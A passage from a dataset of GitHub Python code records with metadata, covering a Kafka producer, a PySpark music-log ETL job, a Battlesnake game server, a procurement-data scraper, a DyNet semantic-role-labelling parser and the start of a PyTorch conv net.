(datetime.datetime.fromtimestamp(os.path.getmtime(fname))).strftime('%Y/%m/%d %H:%M')\n flag = '' if os.path.isdir(i) else ' '\n print('%s\\t\\t%s\\t%10d\\t\\t%s' %(ftime,flag,fsize,fname))\n","repo_name":"xuminnju/PycharmProjects","sub_path":"os/homework_1.py","file_name":"homework_1.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"106788073","text":"from json import dumps\nfrom kafka.producer import KafkaProducer\nimport os\n\nkafka_broker = os.environ.get(\"KAFKA_BROKER\")\nproducer = None\n\n\ndef set_up_a_producer():\n try:\n global producer\n producer = KafkaProducer(\n bootstrap_servers=[kafka_broker],\n value_serializer=lambda x: dumps(x).encode('utf-8')\n )\n except Exception as error:\n print(error)\n set_up_a_producer()\n else:\n print(\"Api has been successfully connected to the broker\")\n\n\nset_up_a_producer()\n","repo_name":"BorissowT/PictureResizeApi","sub_path":"api_container/kafka_client/kafka_producer.py","file_name":"kafka_producer.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37554506717","text":"import configparser\nfrom datetime import datetime\nimport os\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import udf, to_timestamp\nfrom pyspark.sql.functions import (year, month, dayofmonth,\n hour, weekofyear, date_format)\n\nfrom pyspark.sql.types import TimestampType\n\n\nconfig = configparser.ConfigParser()\nconfig.read('dl.cfg')\n\nos.environ['AWS_ACCESS_KEY_ID'] = config['AWS_ACCESS_KEY_ID']\nos.environ['AWS_SECRET_ACCESS_KEY'] = config['AWS_SECRET_ACCESS_KEY']\n\n\ndef create_spark_session():\n '''\n Creates Spark session\n\n Returns\n -------\n SparkSession\n A SparkSession object\n '''\n spark = SparkSession \\\n .builder \\\n .config(\"spark.jars.packages\", \"org.apache.hadoop:hadoop-aws:2.7.0\") \\\n .getOrCreate()\n return spark\n\n\ndef process_song_data(spark, input_data, output_data):\n '''\n Processes song data\n\n Parameters\n ----------\n spark : SparkSession object\n The Spark session to load/save data\n input_data : str\n Input file directory\n output_data : str\n Output parquet file directory\n '''\n # get filepath to song data file\n song_data = input_data + \"song_data/*/*/*\"\n\n # read song data file\n df = spark.read.json(song_data)\n\n # Creating a temp view to isolate info\n df.createOrReplaceTempView(\"songs_table_data\")\n\n # extract columns to create songs table\n songs_table = spark.sql(\"\"\"\n SELECT DISTINCT song_id, title, artist_id, year, duration\n FROM songs_table_data\n \"\"\")\n\n # write songs table to parquet files partitioned by year and artist\n songs_table.write.partitionBy(\"year\", \"artist_id\") \\\n .parquet(output_data + \"songs_table\")\n\n # extract columns to create artists table\n artists_table = spark.sql(\"\"\"\n SELECT DISTINCT artist_id, artist_name, artist_location,\n artist_latitude, artist_longitude\n FROM songs_table_data\n \"\"\")\n\n # write artists table to parquet files\n artists_table.write.mode('overwrite') \\\n .parquet(output_data + \"artists_table\")\n\n\ndef process_log_data(spark, input_data, output_data):\n '''\n Processes log data\n\n Parameters\n ----------\n spark : SparkSession object\n The Spark session to load/save data\n input_data : str\n Input file directory\n output_data : str\n Output parquet file directory\n '''\n # get filepath to log data file\n log_data = input_data + \"log_data/*/*/*\"\n\n # read log data file\n df = spark.read.json(log_data)\n\n # filter by actions for song plays\n df = df.where(df.page == \"NextSong\")\n\n # create timestamp column from original timestamp column\n get_timestamp = udf(lambda x: to_timestamp(x))\n df = df.withColumn('timestamp', get_timestamp('ts'))\n\n # create datetime column from original timestamp column\n get_datetime = udf(lambda x: datetime.fromtimestamp(x/1000),\n TimestampType())\n df = df.withColumn('date_time', get_datetime('ts'))\n\n # Create a view for easier read\n df.createOrReplaceTempView(\"log_data\")\n\n # extract columns for users table\n users_table = spark.sql(\"\"\"\n SELECT DISTINCT qry.userId, qry.firstName, qry.lastName,\n qry.gender, qry.level\n FROM (\n SELECT date_time, userId, firstName, lastName, gender, level,\n RANK() OVER (\n PARTITION BY userId ORDER BY date_time DESC\n ) AS rank\n FROM log_data\n ) AS qry\n WHERE qry.rank = 1\n \"\"\")\n\n # write users table to parquet files\n users_table.write.mode('overwrite').parquet(output_data + \"users_table\")\n\n # extract columns to create time table\n time_table = df.select(\n \"date_time\",\n hour(\"date_time\").alias('hour'),\n dayofmonth(\"date_time\").alias('day'),\n weekofyear(\"date_time\").alias('week'),\n month(\"date_time\").alias('month'),\n year(\"date_time\").alias('year'),\n date_format(\"date_time\", \"u\").alias('weekday')\n ).distinct()\n\n # write time table to parquet files partitioned by year and month\n time_table.write.partitionBy(\"year\", \"month\") \\\n .parquet(output_data + \"time_table\")\n\n # read in song data to use for songplays table\n song_df = spark.read.parquet(output_data + \"songs_table\")\n\n # Create view for workability\n song_df.createOrReplaceTempView(\"songs_table\")\n\n # extract columns from joined song and log datasets to create\n # songplays table\n songplays_table = spark.sql(\"\"\"\n SELECT logs.datetime, times.year, times.month, logs.userId, logs.level,\n que.song_id, que.artist_id, logs.sessionId, logs.location,\n logs.userAgent\n FROM log_data logs\n JOIN time_table times ON logs.datetime = times.datetime\n LEFT JOIN (\n SELECT songs.song_id, songs.title, art.artist_id, art.artist_name\n FROM songs_table songs\n JOIN artists_table art ON songs.artist_id = art.artist_id\n ) AS que ON logs.song = que.title AND logs.artist = que.artist_name\n \"\"\")\n\n # write songplays table to parquet files partitioned by year and month\n songplays_table.write.partitionBy(\"year\", \"month\") \\\n .parquet(output_data + \"songplays_table\")\n\n\ndef main():\n '''\n The main function\n '''\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3a://data_eng/project4/\"\n\n process_song_data(spark, input_data, output_data)\n process_log_data(spark, input_data, output_data)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rtelles64/data_lake","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13611222813","text":"import os\nimport random\nimport json\nimport cherrypy\nimport copy\nimport math\n\n\"\"\"\nThis is a simple Battlesnake server written in Python.\nFor instructions see https://github.com/BattlesnakeOfficial/starter-snake-python/README.md\n\"\"\"\n\n\nclass Battlesnake(object):\n \n @cherrypy.expose\n def index(self):\n # If you open your snake URL in a browser you should see this message.\n return \"Your Battlesnake is alive!\"\n\n @cherrypy.expose\n def ping(self):\n # The Battlesnake engine calls this function to make sure your snake is working.\n return \"pong\"\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n @cherrypy.tools.json_out()\n def start(self):\n # This function is called everytime your snake is entered into a game.\n # cherrypy.request.json contains information about the game that's about to be played.\n # TODO: Use this function to decide how your snake is going to look on the board.\n data = cherrypy.request.json\n print(\"START\")\n return {\"color\": \"#02fa44\", \"headType\": \"smile\", \"tailType\": \"skinny\"}\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n @cherrypy.tools.json_out()\n def move(self):\n # This function is called on every turn of a game. It's how your snake decides where to move.\n # Valid moves are \"up\", \"down\", \"left\", or \"right\".\n # TODO: Use the information in cherrypy.request.json to decide your next move.\n data = cherrypy.request.json\n\n print(\"current turn:\")\n print(data)\n\n class coord:\n def __init__(self, xcoord, ycoord):\n self.x = xcoord\n self.y = ycoord\n\n\n class get_data:\n def __init__(self):\n self.boardsize = coord(data.get(\"board\").get(\"width\"), data.get(\"board\").get(\"height\"))\n self.food = [coord(data.get(\"board\").get(\"food\")[i].get(\"x\"), data.get(\"board\").get(\"food\")[i].get(\"y\")) \\\n for i in range(len(data.get(\"board\").get(\"food\")))]\n self.turn = data.get(\"turn\")\n self.snakes = len(data.get(\"board\").get(\"snakes\"))\n\n\n class snake:\n def __init__(self, num):\n self.body = [coord(data.get(\"board\").get(\"snakes\")[num].get(\"body\")[i].get(\"x\") , \\\n data.get(\"board\").get(\"snakes\")[num].get(\"body\")[i].get(\"y\")) \\\n for i in range(0, len(data.get(\"board\").get(\"snakes\")[num].get(\"body\")))]\n self.head = self.body[0]\n self.health = data.get(\"board\").get(\"snakes\")[num].get(\"health\")\n self.size = len(data.get(\"board\").get(\"snakes\")[num].get(\"body\"))\n\n\n\n def empty_board():\n board = [[\"empty\" for i in range(Gdata.boardsize.x)] for j in range(Gdata.boardsize.y)]\n return board\n\n\n def update_board(allsnakes):\n updated_board = empty_board()\n\n #Add board edges\n for i in range(Gdata.boardsize.x):\n for j in range(Gdata.boardsize.y):\n if i == 0 or j == 0 or i == Gdata.boardsize.x - 1 or j == Gdata.boardsize.y - 1:\n updated_board[i][j] = \"edge \"\n \n #Add food to board (but not if the food is in one of the corners)\n for i in range(len(Gdata.food)):\n if not (Gdata.food[i].x in {0, Gdata.boardsize.x -1} and Gdata.food[i].y in {0, Gdata.boardsize.y -1}):\n updated_board[Gdata.food[i].x][Gdata.food[i].y] = \"food \"\n\n #Add snakes to board\n for i in range(Gdata.snakes):\n for j in range(allsnakes[i].size -1, -1, -1):\n if (i == mine): # If its my snake, label body parts with M\n if (j == 0):\n updated_board[allsnakes[i].head.x][allsnakes[i].head.y] = \"Mhead\"\n else:\n updated_board[allsnakes[i].body[j].x][allsnakes[i].body[j].y] = \"Mbody\"\n else: # If its not my snake, label body parts with that snake's index\n if (j == 0):\n updated_board[allsnakes[i].head.x][allsnakes[i].head.y] = f\"{i}head\"\n else:\n updated_board[allsnakes[i].body[j].x][allsnakes[i].body[j].y] = f\"{i}body\"\n\n #Add potential next moves\n for i in range(Gdata.snakes):\n #Only want other snake's moves and only want potential moves in open spaces\n if (i != mine):\n head = coord(allsnakes[i].head.x, allsnakes[i].head.y)\n if head.x != Gdata.boardsize.x - 1:\n if updated_board[head.x + 1][head.y] in {\"empty\", \"food \", \"edge \"}:\n updated_board[head.x + 1][head.y] = f\"{i}next\"\n if head.x != 0:\n if updated_board[head.x - 1][head.y] in {\"empty\", \"food \", \"edge \"}:\n updated_board[head.x - 1][head.y] = f\"{i}next\"\n if head.y != Gdata.boardsize.y - 1:\n if updated_board[head.x][head.y + 1] in {\"empty\", \"food \", \"edge \"}:\n updated_board[head.x][head.y + 1] = f\"{i}next\"\n if head.y != 0:\n if updated_board[head.x][head.y - 1] in {\"empty\", \"food \", \"edge \"}:\n updated_board[head.x][head.y - 1] = f\"{i}next\"\n return updated_board\n\n\n def print_board(board):\n for y in range(len(board[0])):\n for x in range(len(board)):\n if (board[x][y] == \"empty\"):\n print(\"-----\", end = \" \")\n else: print(board[x][y], end = \" \")\n if (x == len(board)-1):\n print(\"\")\n\n\n def print_snake(snake):\n for i in range(len(snake.body)):\n print(f\"x : {snake.body[i].x}, y : {snake.body[i].y} \")\n\n def move(snake, move):\n if move == \"left\":\n snake.head.x -= 1\n if move == \"right\":\n snake.head.x += 1\n if move == \"up\":\n snake.head.y -= 1\n if move == \"down\":\n snake.head.y += 1\n\n def check_moves(mysnake, board, itteration):\n moves = {\"left\": 0, \"right\": 0, \"up\": 0, \"down\": 0}\n\n #Remove possibility of hitting a wall or the body of a snake\n if (mysnake.body[0].x == 0 or board[mysnake.body[0].x - 1][mysnake.body[0].y][1:5] in {\"body\", \"head\"}): \n del moves[\"left\"]\n if (mysnake.body[0].x == Gdata.boardsize.x - 1 or board[mysnake.body[0].x + 1][mysnake.body[0].y][1:5] in {\"body\", \"head\"}):\n del moves[\"right\"]\n if (mysnake.body[0].y == 0 or board[mysnake.body[0].x][mysnake.body[0].y - 1][1:5] in {\"body\", \"head\"}):\n del moves[\"up\"]\n if (mysnake.body[0].y == Gdata.boardsize.y - 1 or board[mysnake.body[0].x][mysnake.body[0].y + 1][1:5] in {\"body\", \"head\"}):\n del moves[\"down\"]\n\n #Assign a score to each move based on whats in that square\n \n if \"left\" in moves.keys():\n square = board[mysnake.body[0].x - 1][mysnake.body[0].y]\n if square in {\"empty\", \"food \"}:\n moves[\"left\"] = 3\n elif square == \"edge \":\n moves[\"left\"] = 2\n elif square[1:5] == \"next\":\n if mysnake.size > allsnakes[int(square[0])].size:\n moves[\"left\"] = 4\n else:\n moves[\"left\"] = 1\n\n if \"right\" in moves.keys():\n square = board[mysnake.body[0].x + 1][mysnake.body[0].y]\n if square in {\"empty\", \"food \"}:\n moves[\"right\"] = 3\n elif square == \"edge \":\n moves[\"right\"] = 2\n elif square[1:5] == \"next\":\n if mysnake.size > allsnakes[int(square[0])].size:\n moves[\"right\"] = 4\n else:\n moves[\"right\"] = 1\n\n if \"up\" in moves.keys():\n square = board[mysnake.body[0].x][mysnake.body[0].y - 1]\n if square in {\"empty\", \"food \"}:\n moves[\"up\"] = 3\n elif square == \"edge \":\n moves[\"up\"] = 2\n elif square[1:5] == \"next\":\n if mysnake.size > allsnakes[int(square[0])].size:\n moves[\"up\"] = 4\n else:\n moves[\"up\"] = 1\n\n if \"down\" in moves.keys():\n square = board[mysnake.body[0].x][mysnake.body[0].y + 1]\n if square in {\"empty\", \"food \"}:\n moves[\"down\"] = 3\n elif square == \"edge \":\n moves[\"down\"] = 2\n elif square[1:5] == \"next\":\n if mysnake.size > allsnakes[int(square[0])].size:\n moves[\"down\"] = 4\n else:\n moves[\"down\"] = 1\n\n return moves\n \n def simulate_move(allsnakes, itteration):\n\n allsnakes_copy = copy.deepcopy(allsnakes)\n mysnake_copy = allsnakes_copy[mine]\n #For all snakes\n for s in range(Gdata.snakes):\n #For each body part, starting at the tail\n for p in range(allsnakes_copy[s].size -1, 0, -1):\n #Shift one turn forward\n allsnakes_copy[s].body[p] = coord(allsnakes_copy[s].body[p-1].x, allsnakes_copy[s].body[p-1].y)\n\n new_board = update_board(allsnakes_copy) \n\n possible_moves = check_moves(mysnake_copy, new_board, itteration)\n print (f\"Possible moves: {possible_moves}\")\n\n if itteration == 0:\n for k in copy.deepcopy(possible_moves).keys():\n allsnakes_copy2 = copy.deepcopy(allsnakes_copy)\n move(allsnakes_copy2[mine], k)\n if simulate_move(allsnakes_copy2, itteration + 1) == False:\n del possible_moves[k]\n\n max = 0\n for k in possible_moves.keys():\n if possible_moves[k] > max:\n max = possible_moves[k]\n\n final_moves = copy.deepcopy(possible_moves)\n\n for k in possible_moves.keys():\n if possible_moves[k] != max:\n del final_moves[k]\n\n return final_moves\n\n elif itteration == 1:\n if len(possible_moves) > 1:\n itteration += 1\n for k in copy.deepcopy(possible_moves).keys():\n allsnakes_copy2 = copy.deepcopy(allsnakes_copy)\n move(allsnakes_copy2[mine], k)\n if simulate_move(allsnakes_copy2, itteration) == True:\n return True\n\n return False\n\n else: \n if len(possible_moves) == 0:\n return False\n if len(possible_moves) >= 2:\n return True\n if len(possible_moves) == 1:\n\n for k in possible_moves.keys(): \n move(mysnake_copy, k)\n return simulate_move(allsnakes_copy, itteration + 1)\n\n def closest_food():\n head = mysnake.head\n closest = coord((Gdata.boardsize.x - 1)/2, (Gdata.boardsize.y - 1)/2)\n min_dist = 20\n for i in range(len(Gdata.food)):\n distance = abs(head.x - Gdata.food[i].x) + abs(head.y - Gdata.food[i].y)\n\n if distance < min_dist and not (Gdata.food[i].x in {0, Gdata.boardsize.x -1} and Gdata.food[i].y in {0, Gdata.boardsize.y -1}):\n min_dist = distance\n closest = coord(Gdata.food[i].x, Gdata.food[i].y)\n\n #print(f\"closest food is {min_dist} units away at x = {closest.x}, y = {closest.y}\")\n return closest\n\n def move_to_target(moves, target):\n\n if len(moves) < 2:\n return moves\n \n x_dif = target.x - mysnake.head.x\n y_dif = target.y - mysnake.head.y\n\n if x_dif == 0:\n if y_dif < 0:\n if \"up\" in moves:\n return [\"up\"]\n elif (\"left\" in moves or \"right\" in moves) and \"down\" in moves:\n moves.remove(\"down\")\n else:\n if \"down\" in moves:\n return [\"down\"]\n elif (\"left\" in moves or \"right\" in moves) and \"up\" in moves:\n moves.remove(\"up\")\n\n elif y_dif == 0:\n if x_dif > 0:\n if \"right\" in moves:\n return [\"right\"]\n elif (\"up\" in moves or \"down\" in moves) and \"left\" in moves:\n moves.remove(\"left\")\n else: \n if \"left\" in moves:\n return [\"left\"]\n elif (\"up\" in moves or \"down\" in moves) and \"right\" in moves:\n moves.remove(\"right\")\n\n elif y_dif > 0:\n if x_dif > 0 and (\"down\" in moves or \"right\" in moves):\n if \"up\" in moves:\n moves.remove(\"up\")\n if \"left\" in moves:\n moves.remove(\"left\")\n elif x_dif < 0 and (\"down\" in moves or \"left\" in moves):\n if \"up\" in moves:\n moves.remove(\"up\")\n if \"right\" in moves:\n moves.remove(\"right\")\n \n elif y_dif < 0:\n if x_dif > 0 and (\"up\" in moves or \"right\" in moves):\n if \"down\" in moves:\n moves.remove(\"down\")\n if \"left\" in moves:\n moves.remove(\"left\")\n elif x_dif < 0 and (\"up\" in moves or \"left\" in moves):\n if \"down\" in moves:\n moves.remove(\"down\")\n if \"right\" in moves:\n moves.remove(\"right\")\n\n \n\n # if abs(x_dif) > abs(y_dif):\n # if x_dif > 0 and \"right\" in moves:\n # return [\"right\"]\n # if x_dif < 0 and \"left\" in moves:\n # return [\"left\"]\n # else:\n # if y_dif > 0 and \"down\" in moves:\n # return [\"down\"]\n # if y_dif < 0 and \"up\" in moves:\n # return [\"up\"]\n\n return moves\n\n Gdata = get_data()\n allsnakes = [snake(i) for i in range(Gdata.snakes)]\n\n mine = 0\n for i in range (len(allsnakes)):\n if (data.get(\"board\").get(\"snakes\")[i] == data.get(\"you\")):\n mine = i\n break\n\n mysnake = allsnakes[mine]\n\n board = update_board(allsnakes)\n print_board(board)\n possible_moves = simulate_move(allsnakes, 0)\n\n\n final_moves = list(possible_moves.keys())\n print(f\"final moves: {final_moves}\")\n\n \n max_size = 3\n biggest_snake = 0\n for i in range(Gdata.snakes):\n if i != mine and max_size < allsnakes[i].size:\n max_size = allsnakes[i].size\n biggest_snake = i\n\n target = coord(0,0)\n if list(possible_moves.values())[0] == 1:\n print(\"in danger, targetting away from closest food\")\n target = coord(Gdata.boardsize.x - closest_food().x - 1, Gdata.boardsize.y - closest_food().y - 1)\n else:\n if mysnake.size <= max_size:\n print(\"too small, targetting food\")\n target = closest_food()\n else: \n print(\"big enough, targetting biggest snake\")\n target = allsnakes[biggest_snake].head\n \n final_moves = move_to_target(final_moves, target)\n\n move = random.choice(final_moves)\n\n print(f\"chose: {move}\")\n\n return{\"move\": move}\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n def end(self):\n # This function is called when a game your snake was in ends.\n # It's purely for informational purposes, you don't have to make any decisions here.\n data = cherrypy.request.json\n print(\"END\")\n return \"ok\"\n\n\nif __name__ == \"__main__\":\n server = Battlesnake()\n cherrypy.config.update({\"server.socket_host\": \"0.0.0.0\"})\n cherrypy.config.update(\n {\"server.socket_port\": int(os.environ.get(\"PORT\", \"8080\")),}\n )\n print(\"Starting Battlesnake Server...\")\n cherrypy.quickstart(server)\n","repo_name":"chyggen/first-snake","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":17115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5131299094","text":"from ocdskingfisher import util\nfrom ocdskingfisher.base import Source\nimport hashlib\n\n\nclass AfghanistanRecordsSource(Source):\n publisher_name = 'Afghanistan'\n url = 'https://ocds.ageops.net/'\n source_id = 'afghanistan_records'\n\n def gather_all_download_urls(self):\n\n r = util.get_url_request('https://ocds.ageops.net/api/ocds/records')\n if r[1]:\n raise Exception(r[1])\n r = r[0]\n out = []\n for data in r.json():\n if not self.sample or (self.sample and len(out) < 10):\n out.append({\n 'url': data,\n 'filename': hashlib.md5(data.encode('utf-8')).hexdigest(),\n 'data_type': 'record',\n })\n return out\n","repo_name":"odscjames/lhs-alpha","sub_path":"ocdskingfisher/sources/afghanistan_records.py","file_name":"afghanistan_records.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74709652524","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import division\nimport dynet as dy\nimport numpy as np\nfrom lib import *\n\n\nclass BaseParser(object):\n\tdef __init__(self, vocab, word_dims, pret_dims, lemma_dims, tag_dims, dropout_dim,\n\t\t\t\tlstm_layers, lstm_hiddens, dropout_lstm_input, dropout_lstm_hidden, mlp_size, \n\t\t\t\tdropout_mlp):\n\t\t\n\t\tpc = dy.ParameterCollection()\n\t\tself._vocab = vocab\n\t\tself.word_embs = pc.lookup_parameters_from_numpy(vocab.get_word_embs(word_dims))\n\t\tself.pret_word_embs = pc.lookup_parameters_from_numpy(vocab.get_pret_embs(pret_dims))\n\t\tself.lemma_embs = pc.lookup_parameters_from_numpy(vocab.get_lemma_embs(lemma_dims))\n\t\tself.tag_embs = pc.lookup_parameters_from_numpy(vocab.get_tag_embs(tag_dims))\n\t\t\n\t\tself.LSTM_builders = []\n\t\tinput_dims = word_dims + pret_dims + lemma_dims + tag_dims\n\t\tf = orthonormal_VanillaLSTMBuilder(1, input_dims, lstm_hiddens, pc)\n\t\tb = orthonormal_VanillaLSTMBuilder(1, input_dims, lstm_hiddens, pc)\n\t\tself.LSTM_builders.append((f, b))\n\t\tfor i in xrange(lstm_layers - 1):\n\t\t\tf = orthonormal_VanillaLSTMBuilder(1, 2 * lstm_hiddens, lstm_hiddens, pc)\n\t\t\tb = orthonormal_VanillaLSTMBuilder(1, 2 * lstm_hiddens, lstm_hiddens, pc)\n\t\t\tself.LSTM_builders.append((f, b))\n\t\tself.dropout_lstm_input = dropout_lstm_input\n\t\tself.dropout_lstm_hidden = dropout_lstm_hidden\n\n\t\tW = orthonormal_initializer(mlp_size, 2 * lstm_hiddens)\n\t\tself.mlp_arg_W = pc.parameters_from_numpy(W)\n\t\tself.mlp_pred_W = pc.parameters_from_numpy(W)\n\t\tself.mlp_arg_b = pc.add_parameters((mlp_size,), init = dy.ConstInitializer(0.))\n\t\tself.mlp_pred_b = pc.add_parameters((mlp_size,), init = dy.ConstInitializer(0.))\n\t\tself.mlp_size = mlp_size\n\t\tself.dropout_mlp = dropout_mlp\n\n\t\tself.rel_W = pc.add_parameters((vocab.rel_size * (mlp_size +1) , mlp_size + 1), \n\t\t\t\t\t\t\t\t\t\tinit = dy.ConstInitializer(0.))\n\t\tself._pc = pc\n\n\t\tdef _emb_mask_generator(seq_len, batch_size):\n\t\t\tret = []\n\t\t\tfor i in xrange(seq_len):\n\t\t\t\tword_mask = np.random.binomial(1, 1. - dropout_dim, batch_size).astype(np.float32)\n\t\t\t\ttag_mask = np.random.binomial(1, 1. - dropout_dim, batch_size).astype(np.float32)\n\t\t\t\tscale = 3. / (2.*word_mask + tag_mask + 1e-12)\n\t\t\t\tword_mask *= scale\n\t\t\t\ttag_mask *= scale\n\t\t\t\tword_mask = dy.inputTensor(word_mask, batched = True)\n\t\t\t\ttag_mask = dy.inputTensor(tag_mask, batched = True)\n\t\t\t\tret.append((word_mask, tag_mask))\n\t\t\treturn ret\n\t\tself.generate_emb_mask = _emb_mask_generator\n\n\n\t@property \n\tdef parameter_collection(self):\n\t\treturn self._pc\n\n\n\tdef run(self, word_inputs, lemma_inputs, tag_inputs, pred_golds, rel_targets = None, isTrain = True):\n\t\t# inputs, targets: seq_len x batch_size\n\t\tdef dynet_flatten_numpy(ndarray):\n\t\t\treturn np.reshape(ndarray, (-1,), 'F')\n\n\t\tbatch_size = word_inputs.shape[1]\n\t\tseq_len = word_inputs.shape[0]\n\t\tmask = np.greater(word_inputs, self._vocab.DUMMY).astype(np.float32)\n\t\tnum_tokens = int(np.sum(mask))\n\n\t\tword_embs = [dy.lookup_batch(self.word_embs, \n\t\t\t\t\t\t\t\t\tnp.where(w < self._vocab.words_in_train, w, self._vocab.UNK)\n\t\t\t\t\t\t) for w in word_inputs]\n\t\tpre_embs = [dy.lookup_batch(self.pret_word_embs, w) for w in word_inputs]\n\t\tlemma_embs = [dy.lookup_batch(self.lemma_embs, lemma) for lemma in lemma_inputs]\n\t\ttag_embs = [dy.lookup_batch(self.tag_embs, pos) for pos in tag_inputs]\n\t\t\n\t\tif isTrain:\n\t\t\temb_masks = self.generate_emb_mask(seq_len, batch_size)\n\t\t\temb_inputs = [dy.concatenate([dy.cmult(word, wm), dy.cmult(pre, wm), \n\t\t\t\t\t\t\t\t\t\t\tdy.cmult(lemma, wm), dy.cmult(pos, posm)]) \n\t\t\t\t\t\t\tfor word, pre, lemma, pos, (wm, posm) in \n\t\t\t\t\t\t\t\tzip(word_embs, pre_embs, lemma_embs, tag_embs, emb_masks)]\n\t\t\t\n\t\telse:\n\t\t\temb_inputs = [dy.concatenate([word, pre, lemma, pos]) \n\t\t\t\t\t\t\tfor word, pre, lemma, pos in \n\t\t\t\t\t\t\t\tzip(word_embs, pre_embs, lemma_embs, tag_embs)]\n\n\t\ttop_recur = dy.concatenate_cols(\n\t\t\t\t\t\tbiLSTM(self.LSTM_builders, emb_inputs, batch_size, \n\t\t\t\t\t\t\t\tself.dropout_lstm_input if isTrain else 0., \n\t\t\t\t\t\t\t\tself.dropout_lstm_hidden if isTrain else 0.))\n\t\tif isTrain:\n\t\t\ttop_recur = dy.dropout_dim(top_recur, 1, self.dropout_mlp)\n\n\t\tW_arg, b_arg = dy.parameter(self.mlp_arg_W), dy.parameter(self.mlp_arg_b)\n\t\tW_pred, b_pred = dy.parameter(self.mlp_pred_W), dy.parameter(self.mlp_pred_b)\n\t\targ_hidden = leaky_relu(dy.affine_transform([b_arg, W_arg, top_recur]))\n\t\tpred_hidden = leaky_relu(dy.affine_transform([b_pred, W_pred, top_recur]))\n\t\tif isTrain:\n\t\t\targ_hidden = dy.dropout_dim(arg_hidden, 1, self.dropout_mlp)\n\t\t\tpred_hidden = dy.dropout_dim(pred_hidden, 1, self.dropout_mlp)\n\n\t\tW_rel = dy.parameter(self.rel_W)\n\t\t\n\t\trel_logits = bilinear(arg_hidden, W_rel, pred_hidden, self.mlp_size, seq_len, seq_len, batch_size, \n\t\t\t\t\t\t\t\tnum_outputs = self._vocab.rel_size, bias_x = True, bias_y = True)\n\t\t# (#pred x rel_size x #arg) x batch_size\n\t\tflat_rel_logits = dy.reshape(rel_logits, (seq_len, self._vocab.rel_size), seq_len * batch_size)\n\t\t# (#pred x rel_size) x (#arg x batch_size)\n\n\t\tpredicates_1D = dynet_flatten_numpy(pred_golds)\n\t\tpartial_rel_logits = dy.pick_batch(flat_rel_logits, predicates_1D)\n\t\t# (rel_size) x (#arg x batch_size)\n\n\t\tif isTrain:\n\t\t\tmask_1D = dynet_flatten_numpy(mask)\n\t\t\tmask_1D_tensor = dy.inputTensor(mask_1D, batched = True)\n\t\t\trel_preds = partial_rel_logits.npvalue().argmax(0)\n\t\t\ttargets_1D = dynet_flatten_numpy(rel_targets)\n\t\t\trel_correct = np.equal(rel_preds, targets_1D).astype(np.float32) * mask_1D\n\t\t\trel_accuracy = np.sum(rel_correct)/ num_tokens\n\t\t\tlosses = dy.pickneglogsoftmax_batch(partial_rel_logits, targets_1D)\n\t\t\trel_loss = dy.sum_batches(losses * mask_1D_tensor) / num_tokens\n\t\t\treturn rel_accuracy, rel_loss\n\n\t\trel_probs = np.transpose(np.reshape(dy.softmax(dy.transpose(flat_rel_logits)).npvalue(), \n\t\t\t\t\t\t\t\t\t\t\t(self._vocab.rel_size, seq_len, seq_len, batch_size), 'F'))\n\t\toutputs = []\n\t\tfor msk, pred_gold, rel_prob in zip(np.transpose(mask), pred_golds.T, rel_probs):\n\t\t\tmsk[0] = 1.\n\t\t\tsent_len = int(np.sum(msk))\n\t\t\t# pick_shape = pred_gold.shape\n\t\t\t# pick_arrange = np.arange(pick_shape[0])\n\t\t\t# zero_col = np.zeros(pick_shape, dtype = np.int)\n\t\t\t# pred_rel_prob = rel_prob[pick_arrange, zero_col]\n\t\t\tpick_arrange = np.arange(pred_gold.shape[0])\n\t\t\tpred_rel_prob = rel_prob[pick_arrange, pred_gold]\n\t\t\tpred_rel_pred = rel_argmax(pred_rel_prob)\n\t\t\tpred_list = {}\n\t\t\tfor i, rel in enumerate(pred_rel_pred):\n\t\t\t\tif i != 0 and rel != self._vocab.NONE:\n\t\t\t\t\targ_rel_prob = rel_prob[pick_arrange, pred_gold + i]\n\t\t\t\t\targ_rel_pred = rel_argmax(arg_rel_prob)\n\t\t\t\t\tpred_list[i] = arg_rel_pred[1: sent_len]\n\t\t\tpred_list[0] = pred_rel_pred[1: sent_len]\n\t\t\toutputs.append(pred_list)\n\t\treturn outputs\n\n\n\tdef save(self, save_path):\n\t\tself._pc.save(save_path)\n\n\n\tdef load(self, load_path):\n\t\tself._pc.populate(load_path)\n\n","repo_name":"JiaxunCai/Dynet-Biaffine-SRL","sub_path":"CoNLL08-SRL/models/baseParser.py","file_name":"baseParser.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"69908942124","text":"import os\nimport tempfile\nimport numpy as np\nfrom tqdm.notebook import tqdm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.datasets as datasets\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\n\nclass conv_net(nn.Module):\n def __init__(self, input_ch, output_ch):\n super(conv_net, self).__init__()\n self.input_ch = input_ch \n self.output_ch = output_ch\n \n self.nn_net = nn.Sequential(\n nn.Conv2d(input_ch, output_ch*2, 4, 2, 1), # 16x16x8\n nn.BatchNorm2d(output_ch*2), \n nn.ReLU(),\n\n nn.Conv2d(output_ch*2, output_ch*4, 4, 2, 1), # 8x8x16\n nn.BatchNorm2d(output_ch*4), \n nn.ReLU(),\n \n nn.Conv2d(output_ch*4, output_ch*8, 4, 2, 1), # 4x4x32\n nn.BatchNorm2d(output_ch*8), \n nn.ReLU(),\n \n 